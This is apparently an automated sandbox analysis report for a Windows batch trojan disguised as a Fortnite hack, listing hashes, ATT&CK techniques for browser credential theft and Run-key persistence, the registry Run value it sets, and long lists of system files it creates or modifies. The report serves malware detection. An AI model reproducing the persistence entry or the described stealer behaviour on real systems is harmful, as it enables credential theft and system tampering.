d5395f121277d2b38f4173c7df0a20a3de99edfcfe2aa697080cc81170eb76ab

max time kernel
504s
max time network
445s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
10/03/2025, 21:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
Size

34KB
MD5

ac04b6f6fa293c4b55c4c8b49372a9ec
SHA1

9dfca519218c3c10203163454f1237916b0655cc
SHA256

273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92
SHA512

b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086
SSDEEP

192:9TIqVppLuLpDq7QYfLGMV+jasHHLgLxLR44444444444444444M666666666666Q:9rVppLuLpDq7QYfLGMV+jasHHLgLxi

Score

8^/10

persistence spyware stealer

Malware Config

Signatures

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\gmreadme.txt	cmd.exe
File opened for modification	C:\Windows\System32\drivers\gmreadme.txt	cmd.exe
File created	C:\Windows\System32\drivers\gmreadme.txt	cmd.exe
File opened for modification	C:\Windows\SysWOW64\drivers\gmreadme.txt	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_89_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\My-Skidded-malwares-main\\Trojan.Bat.FortniteHackz.bat"	reg.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\@optionalfeatures.png	cmd.exe
File opened for modification	C:\Windows\System32\NETSTAT.EXE	cmd.exe
File opened for modification	C:\Windows\SysWOW64\extrac32.exe	cmd.exe
File opened for modification	C:\Windows\System32\auditpol.exe	cmd.exe
File created	C:\Windows\System32\InfDefaultInstall.exe	cmd.exe
File created	C:\Windows\System32\MoNotificationUx.exe	cmd.exe
File created	C:\Windows\SysWOW64\relog.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\@AudioToastIcon.png	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\tsprint.inf_amd64_abf4521eb250b2d1\tsprint-PipelineConfig.xml	cmd.exe
File opened for modification	C:\Windows\System32\wbengine.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\RMActivate_ssp.exe	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_202973c89a035606\MXDW-pipelineconfig.xml	cmd.exe
File created	C:\Windows\System32\compact.exe	cmd.exe
File created	C:\Windows\SysWOW64\ThumbnailExtractionHost.exe	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\ntprint4.inf_amd64_acefa68322641a2c\Amd64\V3HostingFilter-pipelineconfig.xml	cmd.exe
File opened for modification	C:\Windows\System32\Sysprep\ActionFiles\Generalize.xml	cmd.exe
File created	C:\Windows\SysWOW64\wsmanconfig_schema.xml	cmd.exe
File opened for modification	C:\Windows\System32\icsxml\cmnicfg.xml	cmd.exe
File created	C:\Windows\System32\icsxml\ipcfg.xml	cmd.exe
File opened for modification	C:\Windows\System32\IME\IMEJP\APPLETS\IMJPCLST.XML	cmd.exe
File opened for modification	C:\Windows\System32\bcdedit.exe	cmd.exe
File created	C:\Windows\SysWOW64\RdpSaProxy.exe	cmd.exe
File created	C:\Windows\System32\F12\Timeline.cpu.xml	cmd.exe
File opened for modification	C:\Windows\System32\DDFs\Win32CompatibilityAppraiser_DDF.xml	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_202973c89a035606\MXDW-pipelineconfig.xml	cmd.exe
File opened for modification	C:\Windows\System32\logman.exe	cmd.exe
File created	C:\Windows\System32\setx.exe	cmd.exe
File opened for modification	C:\Windows\System32\SystemResetPlatform\SystemResetPlugins.xml	cmd.exe
File opened for modification	C:\Windows\System32\DDFs\NGCProDDF_v1.2_final.xml	cmd.exe
File opened for modification	C:\Windows\System32\SpatialAudioLicenseSrv.exe	cmd.exe
File opened for modification	C:\Windows\System32\TieringEngineService.exe	cmd.exe
File opened for modification	C:\Windows\System32\tpmvscmgr.exe	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_202973c89a035606\MXDW-pipelineconfig.xml	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_x86_4540e16c07f9c1ad\I386\unishare-pipelineconfig.xml	cmd.exe
File created	C:\Windows\System32\WdsUnattendTemplate.xml	cmd.exe
File opened for modification	C:\Windows\System32\securekernel.exe	cmd.exe
File opened for modification	C:\Windows\System32\X_80.contrast-black.png	cmd.exe
File opened for modification	C:\Windows\System32\Sysprep\ActionFiles\Cleanup.xml	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms004.inf_amd64_258d6d5575e539a1\Amd64\unisharev4-pipelineconfig.xml	cmd.exe
File opened for modification	C:\Windows\System32\SpaceAgent.exe	cmd.exe
File created	C:\Windows\SysWOW64\OposHost.exe	cmd.exe
File created	C:\Windows\SysWOW64\Robocopy.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\ThumbnailExtractionHost.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\default.help.txt	cmd.exe
File opened for modification	C:\Windows\SysWOW64\waitfor.exe	cmd.exe
File created	C:\Windows\SysWOW64\NdfEventView.xml	cmd.exe
File created	C:\Windows\System32\Sysprep\ActionFiles\Cleanup.xml	cmd.exe
File opened for modification	C:\Windows\SysWOW64\gpupdate.exe	cmd.exe
File created	C:\Windows\System32\OkDone_80.contrast-white.png	cmd.exe
File created	C:\Windows\System32\icsxml\cmnicfg.xml	cmd.exe
File opened for modification	C:\Windows\System32\DDFs\Win32CompatibilityAppraiser_DDF.xml	cmd.exe
File opened for modification	C:\Windows\System32\icsxml\osinfo.xml	cmd.exe
File created	C:\Windows\System32\UNP\UpdateNotificationMgr.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\tttracer.exe	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_2e253a68ea5cc455\Amd64\MSXPS2.xml	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms010.inf_amd64_113d0386e369126b\Amd64\MSECP.xml	cmd.exe
File created	C:\Windows\System32\IME\IMEJP\APPLETS\IMJPCLST.XML	cmd.exe
File opened for modification	C:\Windows\System32\psr.exe	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms011.inf_amd64_fb34902231ab4844\Amd64\MSAppMon-pipelineconfig.xml	cmd.exe
File opened for modification	C:\Windows\System32\DDFs\PrinterProvisioning.xml	cmd.exe
File opened for modification	C:\Windows\System32\DDFs\EnrollmentStatusTrackingDDF.xml	cmd.exe
File created	C:\Windows\SysWOW64\regedit.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\TRACERT.EXE	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_ceeb330db4f96bf3\Amd64\unishare-pipelineconfig.xml	cmd.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.2103.1172.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\FeedbackHubSplashScreen.scale-125_altform-colorful.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ShareProvider_CopyLink24x24.scale-100.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-unplated.png	cmd.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Outlook.scale-300.png	cmd.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\FrameworkList.xml	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\AppxManifest.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingNews_1.0.6.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2020.503.58.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-32.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-96_altform-unplated.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.36.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsSplashScreen.scale-100.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSplashLogo.scale-100.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\LargeTile.scale-400.png	cmd.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\PaintSmallTile.scale-200.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-48_altform-unplated_contrast-white.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2102.13.0_x64__8wekyb3d8bbwe\Assets\contrast-black\NotepadSmallTile.scale-400.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-32_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-16_altform-lightunplated.png	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Todos_0.33.33351.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\NewsAppList.targetsize-30_altform-unplated.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-24.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-40_altform-unplated.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Assets\PhotosStoreLogo.contrast-black_scale-200.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Assets\contrast-black\FeedbackHubAppList.targetsize-32_altform-unplated.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-80_altform-lightunplated.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.targetsize-32_contrast-white.png	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\officeinventoryagentfallback.xml	cmd.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\README.txt	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.32731.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_2021.2012.41.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	cmd.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\ipsjpn.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.MicrosoftStickyNotes_4.0.2.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\contrast-black\PowerAutomateAppIcon.targetsize-16.png	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Paper.xml	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN002.XML	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-30_contrast-black.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-60_altform-lightunplated_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-96_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2102.13.0_x64__8wekyb3d8bbwe\Assets\NotepadAppList.targetsize-30.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.scale-150_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Median.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SplashScreen.scale-125_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.21012.10511.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-125_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-80_altform-unplated.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_12008.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-200.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\OutOfOffice.scale-400_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_neutral_~_cw5n1h2txyewy\AppxMetadata\AppxBundleManifest.xml	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL108.XML	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\GetHelpAppList.targetsize-24_altform-unplated.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-24_altform-unplated.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-40.png	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_WHATSNEW.XML	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File created	C:\Program Files (x86)\Internet Explorer\ExtExport.exe	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingNews_1.0.6.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\NewsWideTile.scale-125_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\WeatherAppList.targetsize-48_altform-unplated_contrast-black.png	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\WinSxS\amd64_curl_31bf3856ad364e35_10.0.22000.1_none_d4af4db521f3ebaf\curl.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-t..cesframework-ctfmon_31bf3856ad364e35_10.0.22000.1_none_f3742a79955a9d97\ctfmon.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.22000.1_es-es_0bca84fe9f85e5f5\Report.System.Network.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-nettrace-netsh-helper_31bf3856ad364e35_10.0.22000.1_none_f170fdfd751ceeae\Report.System.NetTrace.xml	cmd.exe
File opened for modification	C:\Windows\PLA\Rules\ja-JP\Rules.System.CPU.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.22000.1_en-us_0bff281a9f5ef450\Report.System.Memory.xml	cmd.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..wsupdateclient-core_31bf3856ad364e35_10.0.22000.493_none_a9fee4e32efd000a\f\74461450967a334ea27548db66c8db015e4c4b86.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_10.0.22000.469_none_5669b3acf1ecab58\r\winload.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\Assets\GetStartedAppList.targetsize-72.png	cmd.exe
File opened for modification	C:\Windows\PLA\Reports\de-DE\Report.System.Summary.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.469_none_04a25ac34c904574\GlobalInstallOrder.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.22000.1_fr-fr_ae81fafd9257fc57\Report.System.Performance.xml	cmd.exe
File created	C:\Windows\servicing\Sessions\31162752_1257653450.xml	cmd.exe
File created	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_windows-senseclient-service_31bf3856ad364e35_10.0.22000.376_none_a359e3d81485694b\f\MsSense.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-securestartup-service_31bf3856ad364e35_10.0.22000.41_none_46e53612c0e92204\r\BdeUISrv.exe	cmd.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\wide310x150logo.scale-100_contrast-black.png	cmd.exe
File opened for modification	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Cortana.UI\Assets\Icons\contrast-white\MediumTile.scale-200.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.22000.194_none_15db8cfb1c6a6b33\logo.targetsize-30_altform-unplated_contrast-black.png	cmd.exe
File created	C:\Windows\WaaS\regkeys\52b78fa9544605e886641d0eb008d4faf901c673.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-dot3svc.resources_31bf3856ad364e35_10.0.22000.1_fr-fr_ffdf1aa32f736fca\Report.System.NetDiagFramework.xml	cmd.exe
File opened for modification	C:\Windows\WaaS\regkeys\c0f73dc1fa6a773108830170f632f13176d75bf7.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-printing-printtopdf_31bf3856ad364e35_10.0.22000.1_none_d87392e24b550bc6\MPDW-pipelineconfig.xml	cmd.exe
File opened for modification	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-provisioning-core_31bf3856ad364e35_10.0.22000.65_none_99e34b544b7754a7\f\CountryTable.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.22000.1_de-de_630e5221b080e88b\Report.System.Disk.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\r\AppxBlockmap.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.22000.318_none_c7ea7e014d4524f4\r\SyncAppvPublishingServer.exe	cmd.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File created	C:\Windows\PLA\Reports\es-ES\Report.System.Common.xml	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AppxBlockMap.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-magnify_31bf3856ad364e35_10.0.22000.41_none_506d5972b4817c83\f\Magnify.exe	cmd.exe
File opened for modification	C:\Windows\SystemResources\Windows.SystemToast.Calling\Images\YourPhoneCallingToast.scale-125_contrast-white.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.318_none_82292a5c4e657627\Cortana.UI\Assets\Icons\AppListIcon.scale-100.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-t..nputpersonalization_31bf3856ad364e35_10.0.22000.1_none_95efb09bcb1d48b8\ipsdan.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-w..wsupdateclient-core_31bf3856ad364e35_10.0.22000.493_none_a9fee4e32efd000a\911f67dd05f6770d9e87b6c6642ad72f4dbf76df.xml	cmd.exe
File created	C:\Windows\PLA\Reports\fr-FR\Report.System.CPU.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-netfx3-core_31bf3856ad364e35_10.0.22000.1_none_bde46cafdee9f8d0\FrameworkList.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\x86_netfx35linq-framework_assemblylist_31bf3856ad364e35_10.0.22000.1_none_cc83029595c91fd2\FrameworkList.xml	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\BingConfiguration\BingConfiguration_pt-BR.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_10.0.22000.41_none_b3f132006d2e6ef5\auxpad.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-systemreset_31bf3856ad364e35_10.0.22000.469_none_e653782f0144d814\SysResetErr.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.22000.120_none_8faca973dc064b74\NarratorAppList.targetsize-30.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.22000.1_none_a3e51f070f511641\RequestedDownloadsLargeCloudIcon.scale-200.png	cmd.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\speech\0409\tokens_enUS.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.22000.1_en-us_0bff281a9f5ef450\Rules.System.Finale.xml	cmd.exe
File opened for modification	C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-w..wsupdateclient-core_31bf3856ad364e35_10.0.22000.493_none_a9fee4e32efd000a\f\4ce89f83f5d24acf7f9e6396fb5d65851e57bd8b.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\Wide310x150Logo.scale-150.png	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\speech\0411\tokens_jaJP.xml	cmd.exe
File created	C:\Windows\PLA\Rules\it-IT\Rules.System.Configuration.xml	cmd.exe
File opened for modification	C:\Windows\PLA\Rules\fr-FR\Rules.System.CPU.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-wmpnss-service_31bf3856ad364e35_10.0.22000.1_none_59ca6978d35cb4de\MediaReceiverRegistrar.xml	cmd.exe
File opened for modification	C:\Windows\PLA\Rules\fr-FR\Rules.System.Network.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.22000.1_en-us_0bff281a9f5ef450\Report.System.Configuration.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_e4b70edd74d735f3\r\RMActivate_isv.exe	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\contrast-black\AppListIcon.targetsize-96_altform-unplated.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.22000.1_none_5ec1e134a70eb45b\BluetoothSystemToastIcon.contrast-white.png	cmd.exe
File created	C:\Windows\servicing\Sessions\Sessions.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\AppxBlockmap.xml	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AppxBlockMap.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-s..zer-en-us-n-onecore_31bf3856ad364e35_10.0.22000.1_none_0c5a9536348c37aa\Tokens_SR_en-US-N.xml	cmd.exe
File opened for modification	C:\Windows\WaaS\regkeys\5c7e9e098d198f0114f76066999378607084a638.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-bootux.deployment_31bf3856ad364e35_10.0.22000.1_none_9454ea72d50a2bf6\bootim.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\HOSTNAME.EXE	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft.configci.commands_31bf3856ad364e35_10.0.22000.51_none_8f36ed7cfebd2222\DefaultWindows_Enforced.xml	cmd.exe
